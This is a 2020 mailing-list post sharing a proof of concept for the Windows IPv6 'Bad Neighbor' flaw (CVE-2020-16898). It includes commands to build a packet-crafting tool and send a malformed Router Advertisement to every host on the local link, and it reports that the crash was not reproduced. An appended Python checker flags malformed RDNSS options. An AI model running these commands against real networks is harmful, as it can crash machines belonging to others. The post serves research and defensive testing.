[ipv6hackers] CVE-2020-16898: "Bad Neighbor" (IPv6 SLAAC/RDNSS)
Fernando Gont
fgont at si6networks.com
Wed Oct 14 16:24:22 UTC 2020
Folks,
You may be aware of CVE-2020-16898. If not, now you are :-) :
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/
I've produced a PoC for the aforementioned vulnerability according to the
description on the McAfee site, but somehow I seem to fail to trigger
the "Blue Screen Of Death" when trying the attack against my local MS
Windows 10 installation.
FWIW, the packet I'm sending can be downloaded (pcap) here:
https://www.gont.com.ar/pcaps/bad-neighbor.pcap
The packet can be crafted with the ra6 tool of the SI6 toolkit present
in the "nd-opt-fuzzing" branch of the GitHub repo
(https://github.com/fgont/ipv6toolkit). That is,

    git clone https://github.com/fgont/ipv6toolkit.git
    cd ipv6toolkit
    git checkout nd-opt-fuzzing
    sudo make install

And then run the ra6 tool as:

    sudo ra6 -i INTERFACE --bad-neighbor -d ff02::1 -v -e

Note that this will target all nodes on the local-link for the INTERFACE
interface. You may set the "-d" option to a unicast address if you want
to target a single system.
I'll keep looking further into this issue and report back to the group
if I find anything.
If you do play with the tool and test the PoC, please do let me/us know.
Thanks!
Regards,
--
Fernando Gont
SI6 Networks
e-mail: fgont at si6networks.com
PGP Fingerprint: 6666 31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492
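
Added example, not part of the original post or of the SI6 toolkit: a defender-side check that walks the options of a Router Advertisement and flags RDNSS options whose Length field breaks the RFC 8106 rule (odd and at least 3), which is the class of malformed option the public CVE-2020-16898 write-ups describe. The function names and the sample packets are constructed for illustration; the samples carry a zero checksum and zeroed addresses.

```python
import struct

ND_ROUTER_ADVERT = 134  # ICMPv6 type: Router Advertisement (RFC 4861)
ND_OPT_RDNSS = 25       # Recursive DNS Server option (RFC 8106)
RA_HEADER_LEN = 16      # fixed RA fields that precede the options


def audit_ra_options(icmp6):
    """Return a list of findings for one ICMPv6 message (bytes after the IPv6 header)."""
    if len(icmp6) < RA_HEADER_LEN or icmp6[0] != ND_ROUTER_ADVERT:
        return []
    findings, off = [], RA_HEADER_LEN
    while off + 2 <= len(icmp6):
        opt_type, opt_len = icmp6[off], icmp6[off + 1]  # length is in 8-octet units
        if opt_len == 0:
            # RFC 4861: an ND packet with a zero-length option must be discarded.
            findings.append(f"option {opt_type} at offset {off}: zero length")
            break
        if off + opt_len * 8 > len(icmp6):
            findings.append(f"option {opt_type} at offset {off}: runs past end of packet")
            break
        # RFC 8106: 8 octets of header plus 16 per address, so Length is 3, 5, 7, ...
        if opt_type == ND_OPT_RDNSS and (opt_len < 3 or opt_len % 2 == 0):
            findings.append(f"RDNSS at offset {off}: invalid length {opt_len}")
        off += opt_len * 8
    return findings


def build_ra(options):
    """Constructed sample RA: hop limit 64, router lifetime 1800, checksum left at 0."""
    return struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0) + options


def rdnss(length_units):
    """Constructed RDNSS option with the given Length field and zero-filled body."""
    header = bytes([ND_OPT_RDNSS, length_units, 0, 0]) + struct.pack("!I", 600)
    return header + bytes(length_units * 8 - 8)


if __name__ == "__main__":
    samples = {
        "well-formed (one address)": build_ra(rdnss(3)),
        "even RDNSS length": build_ra(rdnss(4)),
        "valid option followed by short one": build_ra(rdnss(3) + rdnss(2)),
    }
    for label, packet in samples.items():
        print(label, "->", audit_ra_options(packet) or "ok")
```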